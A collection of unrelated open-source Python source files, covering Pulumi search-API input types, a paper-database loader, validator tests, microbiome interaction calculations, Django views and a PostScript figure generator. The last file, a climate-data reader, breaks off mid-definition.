:param pulumi.Input[bool] disable_personalization: Whether to personalize the results. By default, personal signals will be used to boost results.
"""
if disable_freshness is not None:
pulumi.set(__self__, "disable_freshness", disable_freshness)
if disable_personalization is not None:
pulumi.set(__self__, "disable_personalization", disable_personalization)
@property
@pulumi.getter(name="disableFreshness")
def disable_freshness(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to use freshness as a ranking signal. By default, freshness is used as a ranking signal. Note that this setting is not available in the Admin UI.
"""
return pulumi.get(self, "disable_freshness")
@disable_freshness.setter
def disable_freshness(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_freshness", value)
@property
@pulumi.getter(name="disablePersonalization")
def disable_personalization(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to personalize the results. By default, personal signals will be used to boost results.
"""
return pulumi.get(self, "disable_personalization")
@disable_personalization.setter
def disable_personalization(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_personalization", value)
@pulumi.input_type
class SortOptionsArgs:
def __init__(__self__, *,
operator_name: Optional[pulumi.Input[str]] = None,
sort_order: Optional[pulumi.Input['SortOptionsSortOrder']] = None):
"""
:param pulumi.Input[str] operator_name: Name of the operator corresponding to the field to sort on. The corresponding property must be marked as sortable.
:param pulumi.Input['SortOptionsSortOrder'] sort_order: Ascending is the default sort order
"""
if operator_name is not None:
pulumi.set(__self__, "operator_name", operator_name)
if sort_order is not None:
pulumi.set(__self__, "sort_order", sort_order)
@property
@pulumi.getter(name="operatorName")
def operator_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the operator corresponding to the field to sort on. The corresponding property must be marked as sortable.
"""
return pulumi.get(self, "operator_name")
@operator_name.setter
def operator_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator_name", value)
@property
@pulumi.getter(name="sortOrder")
def sort_order(self) -> Optional[pulumi.Input['SortOptionsSortOrder']]:
"""
Ascending is the default sort order
"""
return pulumi.get(self, "sort_order")
@sort_order.setter
def sort_order(self, value: Optional[pulumi.Input['SortOptionsSortOrder']]):
pulumi.set(self, "sort_order", value)
@pulumi.input_type
class SourceConfigArgs:
def __init__(__self__, *,
crowding_config: Optional[pulumi.Input['SourceCrowdingConfigArgs']] = None,
scoring_config: Optional[pulumi.Input['SourceScoringConfigArgs']] = None,
source: Optional[pulumi.Input['SourceArgs']] = None):
"""
Configurations for a source while processing a Search or Suggest request.
:param pulumi.Input['SourceCrowdingConfigArgs'] crowding_config: The crowding configuration for the source.
:param pulumi.Input['SourceScoringConfigArgs'] scoring_config: The scoring configuration for the source.
:param pulumi.Input['SourceArgs'] source: The source for which this configuration is to be used.
"""
if crowding_config is not None:
pulumi.set(__self__, "crowding_config", crowding_config)
if scoring_config is not None:
pulumi.set(__self__, "scoring_config", scoring_config)
if source is not None:
pulumi.set(__self__, "source", source)
@property
@pulumi.getter(name="crowdingConfig")
def crowding_config(self) -> Optional[pulumi.Input['SourceCrowdingConfigArgs']]:
"""
The crowding configuration for the source.
"""
return pulumi.get(self, "crowding_config")
@crowding_config.setter
def crowding_config(self, value: Optional[pulumi.Input['SourceCrowdingConfigArgs']]):
pulumi.set(self, "crowding_config", value)
@property
@pulumi.getter(name="scoringConfig")
def scoring_config(self) -> Optional[pulumi.Input['SourceScoringConfigArgs']]:
"""
The scoring configuration for the source.
"""
return pulumi.get(self, "scoring_config")
@scoring_config.setter
def scoring_config(self, value: Optional[pulumi.Input['SourceScoringConfigArgs']]):
pulumi.set(self, "scoring_config", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input['SourceArgs']]:
"""
The source for which this configuration is to be used.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input['SourceArgs']]):
pulumi.set(self, "source", value)
@pulumi.input_type
class SourceCrowdingConfigArgs:
def __init__(__self__, *,
num_results: Optional[pulumi.Input[int]] = None,
num_suggestions: Optional[pulumi.Input[int]] = None):
"""
Set search results crowding limits. Crowding is a situation in which multiple results from the same source or host "crowd out" other results, diminishing the quality of search for users. To foster better search quality and source diversity in search results, you can set a condition to reduce repetitive results by source.
:param pulumi.Input[int] num_results: Maximum number of results allowed from a datasource in a result page as long as results from other sources are not exhausted. Value specified must not be negative. A default value is used if this value is equal to 0. To disable crowding, set the value greater than 100.
:param pulumi.Input[int] num_suggestions: Maximum number of suggestions allowed from a source. No limits will be set on results if this value is less than or equal to 0.
"""
if num_results is not None:
pulumi.set(__self__, "num_results", num_results)
if num_suggestions is not None:
pulumi.set(__self__, "num_suggestions", num_suggestions)
@property
@pulumi.getter(name="numResults")
def num_results(self) -> Optional[pulumi.Input[int]]:
"""
Maximum number of results allowed from a datasource in a result page as long as results from other sources are not exhausted. Value specified must not be negative. A default value is used if this value is equal to 0. To disable crowding, set the value greater than 100.
"""
return pulumi.get(self, "num_results")
@num_results.setter
def num_results(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_results", value)
@property
@pulumi.getter(name="numSuggestions")
def num_suggestions(self) -> Optional[pulumi.Input[int]]:
"""
Maximum number of suggestions allowed from a source. No limits will be set on results if this value is less than or equal to 0.
"""
return pulumi.get(self, "num_suggestions")
@num_suggestions.setter
def num_suggestions(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_suggestions", value)
@pulumi.input_type
class SourceScoringConfigArgs:
def __init__(__self__, *,
source_importance: Optional[pulumi.Input['SourceScoringConfigSourceImportance']] = None):
"""
Set the scoring configuration. This allows modifying the ranking of results for a source.
:param pulumi.Input['SourceScoringConfigSourceImportance'] source_importance: Importance of the source.
"""
if source_importance is not None:
pulumi.set(__self__, "source_importance", source_importance)
@property
@pulumi.getter(name="sourceImportance")
def source_importance(self) -> Optional[pulumi.Input['SourceScoringConfigSourceImportance']]:
"""
Importance of the source.
"""
return pulumi.get(self, "source_importance")
@source_importance.setter
def source_importance(self, value: Optional[pulumi.Input['SourceScoringConfigSourceImportance']]):
pulumi.set(self, "source_importance", value)
@pulumi.input_type
class SourceArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
predefined_source: Optional[pulumi.Input['SourcePredefinedSource']] = None):
"""
Defines sources for the suggest/search APIs.
:param pulumi.Input[str] name: Source name for content indexed by the Indexing API.
:param pulumi.Input['SourcePredefinedSource'] predefined_source: Predefined content source for Google Apps.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if predefined_source is not None:
pulumi.set(__self__, "predefined_source", predefined_source)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Source name for content indexed by the Indexing API.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="predefinedSource")
def predefined_source(self) -> Optional[pulumi.Input['SourcePredefinedSource']]:
"""
Predefined content source for Google Apps.
"""
return pulumi.get(self, "predefined_source")
@predefined_source.setter
def predefined_source(self, value: Optional[pulumi.Input['SourcePredefinedSource']]):
pulumi.set(self, "predefined_source", value)
@pulumi.input_type
class ValueFilterArgs:
def __init__(__self__, *,
operator_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input['ValueArgs']] = None):
"""
:param pulumi.Input[str] operator_name: The `operator_name` applied to the query, such as *price_greater_than*. The filter can work against both types of filters defined in the schema for your data source: 1. `operator_name`, where the query filters results by the property that matches the value. 2. `greater_than_operator_name` or `less_than_operator_name` in your schema. The query filters the results for the property values that are greater than or less than the supplied value in the query.
:param pulumi.Input['ValueArgs'] value: The value to be compared with.
"""
if operator_name is not None:
pulumi.set(__self__, "operator_name", operator_name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter(name="operatorName")
def operator_name(self) -> Optional[pulumi.Input[str]]:
"""
The `operator_name` applied to the query, such as *price_greater_than*. The filter can work against both types of filters defined in the schema for your data source: 1. `operator_name`, where the query filters results by the property that matches the value. 2. `greater_than_operator_name` or `less_than_operator_name` in your schema. The query filters the results for the property values that are greater than or less than the supplied value in the query.
"""
return pulumi.get(self, "operator_name")
@operator_name.setter
def operator_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator_name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input['ValueArgs']]:
"""
The value to be compared with.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input['ValueArgs']]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ValueArgs:
def __init__(__self__, *,
boolean_value: Optional[pulumi.Input[bool]] = None,
date_value: Optional[pulumi.Input['DateArgs']] = None,
double_value: Optional[pulumi.Input[float]] = None,
integer_value: Optional[pulumi.Input[str]] = None,
string_value: Optional[pulumi.Input[str]] = None,
timestamp_value: Optional[pulumi.Input[str]] = None):
"""
Definition of a single value with generic type.
"""
if boolean_value is not None:
pulumi.set(__self__, "boolean_value", boolean_value)
if date_value is not None:
pulumi.set(__self__, "date_value", date_value)
if double_value is not None:
pulumi.set(__self__, "double_value", double_value)
if integer_value is not None:
pulumi.set(__self__, "integer_value", integer_value)
if string_value is not None:
pulumi.set(__self__, "string_value", string_value)
if timestamp_value is not None:
pulumi.set(__self__, "timestamp_value", timestamp_value)
@property
@pulumi.getter(name="booleanValue")
def boolean_value(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "boolean_value")
@boolean_value.setter
def boolean_value(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "boolean_value", value)
@property
@pulumi.getter(name="dateValue")
def date_value(self) -> Optional[pulumi.Input['DateArgs']]:
return pulumi.get(self, "date_value")
@date_value.setter
def date_value(self, value: Optional[pulumi.Input['DateArgs']]):
pulumi.set(self, "date_value", value)
@property
@pulumi.getter(name="doubleValue")
def double_value(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "double_value")
@double_value.setter
def double_value(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "double_value", value)
@property
@pulumi.getter(name="integerValue")
def integer_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "integer_value")
@integer_value.setter
def integer_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "integer_value", value)
@property
@pulumi.getter(name="stringValue")
def string_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "string_value")
@string_value.setter
def string_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "string_value", value)
@property
@pulumi.getter(name="timestampValue")
def timestamp_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "timestamp_value")
@timestamp_value.setter
def timestamp_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timestamp_value", value)
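# Illustrative sketch (an assumption, not part of the generated SDK): ValueArgs
# above reads as a one-of union, so presumably exactly one *_value field should
# be populated. A plain-dict helper that enforces that reading:

```python
VALUE_FIELDS = ("boolean_value", "date_value", "double_value",
                "integer_value", "string_value", "timestamp_value")

def single_value_kind(d):
    """Return the one populated value field of a plain-dict ValueArgs stand-in."""
    kinds = [k for k in VALUE_FIELDS if d.get(k) is not None]
    if len(kinds) != 1:
        raise ValueError(f"expected exactly one value field, got {kinds}")
    return kinds[0]
```

# single_value_kind and the dict form are hypothetical names for illustration.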
# pysrc/papers/db/loaders.py (JetBrains-Research/pubtrends, Apache-2.0)
from pysrc.papers.db.pm_postgres_loader import PubmedPostgresLoader
from pysrc.papers.db.postgres_connector import PostgresConnector
from pysrc.papers.db.ss_postgres_loader import SemanticScholarPostgresLoader
from pysrc.papers.utils import PUBMED_ARTICLE_BASE_URL, SEMANTIC_SCHOLAR_BASE_URL
from pysrc.prediction.ss_arxiv_loader import SSArxivLoader
from pysrc.prediction.ss_pubmed_loader import SSPubmedLoader
class Loaders:
@staticmethod
def source(loader, test=False):
# Determine source to provide correct URLs to articles,
# see #get_loader_and_url_prefix
# TODO: Bad design, refactor
if isinstance(loader, PubmedPostgresLoader):
return 'Pubmed'
elif isinstance(loader, SemanticScholarPostgresLoader):
return 'Semantic Scholar'
elif isinstance(loader, SSArxivLoader):
return 'SSArxiv'
elif isinstance(loader, SSPubmedLoader):
return 'SSPubmed'
elif not test:
raise TypeError(f'Unknown loader {loader}')
@staticmethod
def get_loader_and_url_prefix(source, config):
if PostgresConnector.postgres_configured(config):
if source == 'Pubmed':
return PubmedPostgresLoader(config), PUBMED_ARTICLE_BASE_URL
elif source == 'Semantic Scholar':
return SemanticScholarPostgresLoader(config), SEMANTIC_SCHOLAR_BASE_URL
else:
raise ValueError(f"Unknown source {source}")
else:
raise ValueError("No database configured")
@staticmethod
def get_loader(source, config):
return Loaders.get_loader_and_url_prefix(source, config)[0]
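# Sketch of the refactor hinted at by the "Bad design, refactor" TODO above
# (hypothetical, not part of the repo): replace the isinstance chain with a
# class-to-name registry, so adding a loader no longer requires editing
# Loaders.source. Names below (register_source, source_of, FakePubmedLoader)
# are invented for illustration.

```python
_SOURCE_BY_CLASS = {}

def register_source(name):
    """Class decorator recording which source name a loader class serves."""
    def deco(cls):
        _SOURCE_BY_CLASS[cls] = name
        return cls
    return deco

@register_source("Pubmed")
class FakePubmedLoader:  # stand-in for PubmedPostgresLoader
    pass

def source_of(loader):
    for cls, name in _SOURCE_BY_CLASS.items():
        if isinstance(loader, cls):
            return name
    raise TypeError(f"Unknown loader {loader!r}")
```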
# valid8/tests/validation_lib/test_validators_comparables.py (smarie/python-valid8, BSD-3-Clause)
import pytest
from valid8.validation_lib import gt, gts, lt, lts, between, NotInRange, TooSmall, TooBig
def test_gt():
""" tests that the gt() function works """
assert gt(1)(1)
with pytest.raises(TooSmall):
gt(-1)(-1.1)
def test_gts():
""" tests that the gts() function works """
with pytest.raises(TooSmall):
gts(1)(1)
assert gts(-1)(-0.9)
def test_lt():
""" tests that the lt() function works """
assert lt(1)(1)
with pytest.raises(TooBig):
lt(-1)(-0.9)
def test_lts():
""" tests that the lts() function works """
with pytest.raises(TooBig):
lts(1)(1)
assert lts(-1)(-1.1)
def test_between():
""" tests that the between() function works """
assert between(0, 1)(0)
assert between(0, 1)(1)
with pytest.raises(NotInRange):
between(0, 1)(-0.1)
with pytest.raises(NotInRange):
between(0, 1)(1.1)
def test_numpy_nan():
""" Test that a numpy nan is correctly handled """
import numpy as np
with pytest.raises(TooSmall) as exc_info:
gt(5.1)(np.nan)
with pytest.raises(TooBig) as exc_info:
lt(5.1)(np.nan)
with pytest.raises(NotInRange) as exc_info:
between(5.1, 5.2)(np.nan)
# .ipynb_checkpoints/GenerateLambdas-checkpoint.py (ponte-vecchio/Deepfake-Microbiomes, MIT)
import numpy as np
import pandas as pd
def GenerateLambdasFromExcel(Experiment,File = "Pairwise_Chemostat.xlsx",version = "Equilibrium",mu = 1):
Community = Experiment.Community
Invader = Experiment.Invader
RelativeAbundanceAll = pd.read_excel(File,sheet_name = "Relative_Abundance",index_col = 0)
CommunityIndex = []
foundList = []
for CM in Community:
if len(CM):
try:
CommunityIndex += [RelativeAbundanceAll.index[np.where(RelativeAbundanceAll.index.str.find(CM)>0)][0]]
foundList += [CM]
except IndexError:
print(CM + " not found")
if Invader != None:
try:
InvaderIndex = RelativeAbundanceAll.index[np.where(RelativeAbundanceAll.index.str.find(Invader)>0)][0]
except IndexError:
print("Invader Not Found")
return None
CommunityIndex = [cm for cm in np.unique(CommunityIndex) if cm != InvaderIndex]
#print(RelativeAbundanceAll.index[np.where(RelativeAbundanceAll.index.str.find("intestini")>0)])
###Get a list of community members.
All = list(CommunityIndex) + [InvaderIndex]
else:
CommunityIndex = np.unique(CommunityIndex)
#print(RelativeAbundanceAll.index[np.where(RelativeAbundanceAll.index.str.find("intestini")>0)])
###Get a list of community members.
All = list(CommunityIndex)
RelativeAbundance = RelativeAbundanceAll.loc[All,All]
## \lambda_i^j = \alpha_{ji} - \alpha_{jj} - \mu*(\alpha_{ij} - \alpha_{ji})
### \mu = 1/[(R_0 - 1)k]
#### k -> mean interaction value. No idea how to estimate.
#### R_0 Basic reproduction number. Similarly no idea, except that R_0>1
mean_interaction = mu
if version == "Equilibrium":
AllLambdas = pd.DataFrame(columns = RelativeAbundance.columns, index = RelativeAbundance.index)
for i in range(len(AllLambdas.index)):
for j in range(i+1):
if i==j:
AllLambdas.iloc[i,j] = 0
elif RelativeAbundance.iloc[i,j] == 0:
AllLambdas.iloc[i,j] = -mean_interaction
AllLambdas.iloc[j,i] = mean_interaction
elif RelativeAbundance.iloc[j,i] == 0:
AllLambdas.iloc[i,j] = mean_interaction
AllLambdas.iloc[j,i] = -mean_interaction
else:
AllLambdas.iloc[i,j] = mean_interaction*RelativeAbundance.iloc[i,j]/(1-RelativeAbundance.iloc[i,j])
AllLambdas.iloc[j,i] = mean_interaction
elif version == "LogRatio":
TotalMassAll = pd.read_excel(File,sheet_name = "Total_Biomass",index_col = 0)
TotalMass = TotalMassAll.loc[All,All]
GrowthMass = RelativeAbundance*TotalMass
GrowthMass.replace(to_replace = 0, value = 0.001, inplace = True)
Alphas = np.log((GrowthMass.T/np.diag(GrowthMass)).T)
AllLambdas = Alphas.T - np.diag(Alphas) - mu*(Alphas - Alphas.T)
elif version == "Difference":
TotalMassAll = pd.read_excel(File,sheet_name = "Total_Biomass",index_col = 0)
TotalMass = TotalMassAll.loc[All,All]
GrowthMass = RelativeAbundance*TotalMass
Alphas = (GrowthMass.T - np.diag(GrowthMass)).T
AllLambdas = Alphas.T - np.diag(Alphas) - mu*(Alphas - Alphas.T)
CommLambdas = AllLambdas.loc[CommunityIndex,CommunityIndex]
if Invader != None:
LambdaInvaderComm = AllLambdas.loc[InvaderIndex].values[:-1]
LambdaCommInvader = AllLambdas.loc[:,InvaderIndex].values[:-1]
return CommLambdas,LambdaInvaderComm,LambdaCommInvader,foundList
else:
return CommLambdas,foundList
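# Toy numeric check of the "Equilibrium" branch above (illustrative numbers,
# not experimental data): for an off-diagonal pair (i, j) with both relative
# abundances nonzero, the code sets lambda[i][j] = mu * R[i][j] / (1 - R[i][j])
# and lambda[j][i] = mu.

```python
mu = 1.0
R = [[0.0, 0.25],
     [0.75, 0.0]]
lam = [[0.0, 0.0], [0.0, 0.0]]
i, j = 1, 0                                # off-diagonal pair, both nonzero
lam[i][j] = mu * R[i][j] / (1 - R[i][j])   # 0.75 / 0.25
lam[j][i] = mu
```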
def GenerateLambdasFromExcelAllPairs(File,version = "Equilibrium",mu = 1):
RelativeAbundanceAll = pd.read_excel(File,sheet_name = "Relative_Abundance",index_col = 0)
All = RelativeAbundanceAll.index
## \lambda_i^j = \alpha_{ji} - \alpha_{jj} - \mu*(\alpha_{ij} - \alpha_{ji})
### \mu = 1/[(R_0 - 1)k]
#### k -> mean interaction value. No idea how to estimate.
#### R_0 Basic reproduction number. Similarly no idea, except that R_0>1
mean_interaction = mu
if version == "Equilibrium":
AllLambdas = pd.DataFrame(columns = RelativeAbundanceAll.columns, index = RelativeAbundanceAll.index)
for i in range(len(AllLambdas.index)):
for j in range(i+1):
if i==j:
AllLambdas.iloc[i,j] = 0
elif RelativeAbundanceAll.iloc[i,j] == 0:
AllLambdas.iloc[i,j] = -mean_interaction
AllLambdas.iloc[j,i] = mean_interaction
elif RelativeAbundanceAll.iloc[j,i] == 0:
AllLambdas.iloc[i,j] = mean_interaction
AllLambdas.iloc[j,i] = -mean_interaction
else:
AllLambdas.iloc[i,j] = mean_interaction*RelativeAbundanceAll.iloc[i,j]/(1-RelativeAbundanceAll.iloc[i,j])
AllLambdas.iloc[j,i] = mean_interaction
elif version == "LogRatio":
TotalMassAll = pd.read_excel(File,sheet_name = "Total_Biomass",index_col = 0)
GrowthMass = RelativeAbundanceAll*TotalMassAll
GrowthMass.replace(to_replace = 0, value = 0.001, inplace = True)
Alphas = np.log((GrowthMass.T/np.diag(GrowthMass)).T)
AllLambdas = Alphas.T - np.diag(Alphas) - mu*(Alphas - Alphas.T)
elif version == "Difference":
TotalMassAll = pd.read_excel(File,sheet_name = "Total_Biomass",index_col = 0)
GrowthMass = RelativeAbundanceAll*TotalMassAll
Alphas = (GrowthMass.T - np.diag(GrowthMass)).T
AllLambdas = Alphas.T - np.diag(Alphas) - mu*(Alphas - Alphas.T)
return AllLambdas
# currencies/tests/test_urls.py (guestready/django-currencies, BSD-3-Clause)
# -*- coding: utf-8 -*-
from django.conf.urls import *
from django.views.generic import TemplateView
urlpatterns = [
url(r'^currencies/', include('currencies.urls')),
url(r'^$', TemplateView.as_view(template_name='index.html')),
url(r'^context_processor$', TemplateView.as_view(template_name='context_processor.html')),
url(r'^context_tag$', TemplateView.as_view(template_name='context_tag.html')),
]
# spiro/elastfe.py (behdad/fontcrunch, Apache-2.0)
# coding: utf-8
# Copyright 2013 The Font Bakery Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# See AUTHORS.txt for the list of Authors and LICENSE.txt for the License.
#
# Figures for finite element model of elastica
import sys
from math import *
def prolog():
print '%!PS-Adobe-3.0 EPSF'
print '%%EndComments'
print '%%EndProlog'
print '%%Page: 1 1'
print '/cshow {dup stringwidth exch -.5 mul exch rmoveto show} bind def'
print '/circle { ss 0 moveto currentpoint exch ss sub exch ss 0 360 arc } bind def'
def eps_trailer():
    print('%%EOF')


def arrow(x0, y0, length, th, headlen=5, headwid=6):
    print('gsave', x0, y0, 'translate', th, 'rotate')
    print(0, 0, 'moveto', length - .5 * headlen, 0, 'lineto stroke')
    print(length, 0, 'moveto', -headlen, -.5 * headwid, 'rlineto', 0, headwid, 'rlineto fill')
    print('grestore')
def strutfig():
    prolog()
    print('/Times-Roman 12 selectfont')
    print(3, 'setlinewidth')
    print(100, 100, 'moveto', 200, 0, 'rlineto stroke')
    print(.75, 'setlinewidth')
    arrow(100, 100, 50, 180)
    arrow(300, 100, 50, 0)
    print(75, 105, 'moveto (T) cshow')
    print(325, 105, 'moveto (T) cshow')
    print('showpage')
    eps_trailer()
def pivotfig():
    prolog()
    th = 20
    moment = 25
    print(3, 'setlinewidth')
    print('gsave', 300, 100, 'translate', -.5 * th, 'rotate')
    print(0, 0, 'moveto', -150, 0, 'rlineto stroke')
    print(.75, 'setlinewidth')
    print(0, 0, 'moveto', 50, 0, 'rlineto stroke')
    print(40, 0, 'moveto', 0, 0, 40, 0, th, 'arc stroke')
    arrow(-150, 0, moment, 270)
    print('grestore')
    print('gsave', 300, 100, 'translate', .5 * th, 'rotate')
    print(0, 0, 'moveto', 150, 0, 'rlineto stroke')
    print('/ss', 4, 'def circle fill')
    print(.75, 'setlinewidth')
    arrow(150, 0, moment, 270)
    print('grestore')
    print(.75, 'setlinewidth')
    arrow(300, 100, 2 * moment * cos(.5 * th * pi / 180), 90)
    print('/Symbol 12 selectfont')
    print(345, 96, 'moveto (Dq) show')
    print('/Times-Roman 12 selectfont')
    print(155, 109, 'moveto (M) show')
    print(455, 112, 'moveto (M) show')
    print(303, 125, 'moveto (2M) show 1 0 rmoveto (cos) show')
    print('/Symbol 12 selectfont 1 0 rmoveto (\\(Dq/2\\)) show')
    print('showpage')
    eps_trailer()
def chainfig():
    prolog()
    th0 = 25
    th1 = 30
    th2 = 35
    m = 1.5
    thrad = 35
    print(3, 'setlinewidth')
    print('gsave', 300, 100, 'translate', -1 * th1, 'rotate')
    print('gsave', -150, 0, 'translate', -1 * th0, 'rotate')
    print(0, 0, 'moveto', -100, 0, 'rlineto stroke')
    print(.75, 'setlinewidth')
    print(0, 0, 'moveto', 50, 0, 'rlineto stroke')
    print(thrad, 0, 'moveto', 0, 0, thrad, 0, th0, 'arc stroke')
    print('/ss', 4, 'def circle fill')
    print('grestore')
    print(0, 0, 'moveto', -150, 0, 'rlineto stroke')
    print(.75, 'setlinewidth')
    # print(0, 0, 'moveto', 50, 0, 'rlineto stroke')
    arrow(0, 0, 50, 0)
    arrow(0, 0, m * th0, 270)
    print(thrad, 0, 'moveto', 0, 0, thrad, 0, th1, 'arc stroke')
    print('grestore')
    print('gsave', 300, 100, 'translate', 0, 'rotate')
    print(0, 0, 'moveto', 150, 0, 'rlineto stroke')
    print('/ss', 4, 'def circle fill')
    print(.75, 'setlinewidth')
    arrow(0, 0, 50, 180)
    arrow(0, 0, m * th1 * 2 * cos(.5 * th1 * pi / 180), 90 - .5 * th1)
    arrow(0, 0, m * th2, 270)
    print(150, 0, 'translate')
    print(0, 0, 'moveto', 50, 0, 'rlineto stroke')
    print(thrad, 0, 'moveto', 0, 0, thrad, 0, th2, 'arc stroke')
    print('grestore')
    print('gsave', 450, 100, 'translate', 1 * th2, 'rotate')
    print(0, 0, 'moveto', 100, 0, 'rlineto stroke')
    print('/ss', 4, 'def circle fill')
    print('grestore')
    print('/Symbol 12 selectfont')
    print(162 + thrad, 142, 'moveto (Dq) show')
    print('/Times-Roman 9 selectfont 0 -2 rmoveto (0) show')
    print('/Symbol 12 selectfont')
    print(302 + thrad, 85, 'moveto (Dq) show')
    print('/Times-Roman 9 selectfont 0 -2 rmoveto (1) show')
    print('/Symbol 12 selectfont')
    print(452 + thrad, 108, 'moveto (Dq) show')
    print('/Times-Roman 9 selectfont 0 -2 rmoveto (2) show')
    print('/Times-Roman 12 selectfont')
    print(233, 96, 'moveto (T) show')
    print('/Times-Roman 9 selectfont 0 -2 rmoveto (1) show')
    print('/Times-Roman 12 selectfont')
    print(345, 70, 'moveto (T) show')
    print('/Times-Roman 9 selectfont 0 -2 rmoveto (0) show')
    print('/Times-Roman 12 selectfont')
    print(286 - 10 * m, 92 - 23 * m, 'moveto (M) show')
    print('/Times-Roman 9 selectfont 0 -2 rmoveto (0) show')
    print('/Times-Roman 12 selectfont')
    print(296 + 14 * m, 102 + 58 * m, 'moveto (2M) show')
    print('/Times-Roman 9 selectfont 0 -2 rmoveto (1) show')
    print('/Times-Roman 12 selectfont 1 2 rmoveto (cos\\() show')
    print('/Symbol 12 selectfont 1 0 rmoveto (Dq) show')
    print('/Times-Roman 9 selectfont 0 -2 rmoveto (1) show')
    print('/Times-Roman 12 selectfont 0 2 rmoveto (/2\\)) show')
    print('/Times-Roman 12 selectfont')
    print(296, 92 - 36 * m, 'moveto (M) show')
    print('/Times-Roman 9 selectfont 0 -2 rmoveto (2) show')
    print('/Times-Roman 12 selectfont')
    print(240, 140, 'moveto (0) show')
    print(375, 105, 'moveto (1) show')
    print(495, 140, 'moveto (2) show')
    print('showpage')
    eps_trailer()
if __name__ == '__main__':
    figname = sys.argv[1]
    if len(figname) > 4 and figname.endswith('.pdf'):
        figname = figname[:-4]
    if figname == 'strutfig':
        strutfig()
    elif figname == 'pivotfig':
        pivotfig()
    elif figname == 'chainfig':
        chainfig()
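These figure functions write PostScript straight to stdout, so the script is normally run with shell redirection (e.g. `python elastfe.py strutfig > strutfig.eps`). A minimal, self-contained sketch of capturing that output in memory instead; the two-line `prolog` below is a trimmed illustrative copy made for the demo, not an import of this module:

```python
import io
from contextlib import redirect_stdout


def prolog():
    # Trimmed illustrative copy of the prolog() above (two lines only).
    print('%!PS-Adobe-3.0 EPSF')
    print('%%EndComments')


# Capture the emitted EPS text in memory instead of redirecting stdout
# in the shell; the same pattern works for any of the figure functions.
buf = io.StringIO()
with redirect_stdout(buf):
    prolog()
eps = buf.getvalue()
```

The captured string can then be written to a file or post-processed before saving.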
# resources/routes.py (costayca/SmallAPIUserAndIngredients, MIT)
from .movie import MovieApi, MoviesApi
from .auth import SignupApi, LoginApi
from .ingredient import IngredientApi, IngredientsApi
# from .kerasApi import KerasApi
from .fastaiApi import FastaiApi
def initialize_routes(api):
api.add_resource(MoviesApi, '/api/movies')
api.add_resource(MovieApi, '/api/movies/<id>')
api.add_resource(IngredientsApi, '/api/ingredients')
api.add_resource(IngredientApi, '/api/ingredients/<id>')
api.add_resource(SignupApi, '/api/auth/signup')
api.add_resource(LoginApi, '/api/auth/login')
# api.add_resource(KerasApi, '/api/keras')
    api.add_resource(FastaiApi, '/api/fastai')
# blogging/views.py (greeneyedsoandso/django, Unlicense)
from django.shortcuts import render
from django.shortcuts import redirect
from django.utils import timezone
from django.views.generic.detail import DetailView
from django.views.generic.edit import CreateView
from django.views.generic.list import ListView

from blogging.forms import MyCommentForm
from blogging.models import Comment, Post
class PostListView(ListView):
template_name = "blogging/list.html"
queryset = Post.objects.exclude(published_date__exact=None).order_by(
"-published_date"
)
class PostDetailView(DetailView):
model = Post
template_name = "blogging/detail.html"
queryset = Post.objects.exclude(published_date__exact=None)
class CommentCreateView(CreateView):
    model = Comment
    template_name = "blogging/add.html"
    fields = []


def add_model(request):
    # Function-based view handling the comment form; the timestamp is set
    # server-side before saving.
    if request.method == "POST":
        form = MyCommentForm(request.POST)
        if form.is_valid():
            model_instance = form.save(commit=False)
            model_instance.timestamp = timezone.now()
            model_instance.save()
            return redirect("/")
    else:
        form = MyCommentForm()
    return render(request, "blogging/add.html", {"object": form})
# primap2/pm2io/_data_reading.py (mikapfl/primap2, ECL-2.0 / Apache-2.0)
import datetime
import itertools
from pathlib import Path
from typing import (
IO,
Any,
Callable,
Dict,
Hashable,
Iterable,
List,
Optional,
Set,
Union,
)
import numpy as np
import pandas as pd
from loguru import logger
from .. import _alias_selection
from .._units import ureg
from . import _conversion
from ._interchange_format import (
INTERCHANGE_FORMAT_COLUMN_ORDER,
INTERCHANGE_FORMAT_MANDATORY_COLUMNS,
INTERCHANGE_FORMAT_OPTIONAL_COLUMNS,
)
SEC_CATS_PREFIX = "sec_cats__"
NA_VALUES = [
"nan",
"NE",
"-",
"NA, NE",
"NO,NE",
"NA,NE",
"NE,NO",
"NE0",
"NO, NE",
]
def convert_long_dataframe_if(
